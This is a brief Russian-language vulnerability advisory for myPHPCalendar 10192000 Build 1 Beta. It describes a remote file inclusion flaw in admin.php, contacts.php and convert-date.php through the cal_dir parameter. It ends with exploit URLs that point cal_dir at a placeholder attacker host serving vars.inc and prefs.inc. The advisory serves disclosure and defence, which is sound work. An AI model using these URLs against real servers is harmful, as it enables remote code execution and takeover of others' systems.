Программа: myPHPCalendar 10192000 Build 1 Beta
Уязвимость обнаружена в myPHPCalendar. Удаленный атакующий может выполнить произвольный PHP код, включая команды операционной системы, на целевой системе.
Сценарии 'admin.php', 'contacts.php', и 'convert-date.php' включают файлы из $cal_dir каталога. Удаленный пользователь может определить удаленное местоположение для $cal_dir каталога, чтобы включить и выполнить произвольный PHP сценарий на целевом сервере.
Пример/Эксплоит:
http://[target]/admin.php? cal_dir=http://[attacker]/
http://[target]/contacts.php? cal_dir=http://[attacker]/
http://[target]/convert-date.php? cal_dir=http://[attacker]/
где
http://[attacker]/vars.inc
http://[attacker]/prefs.inc
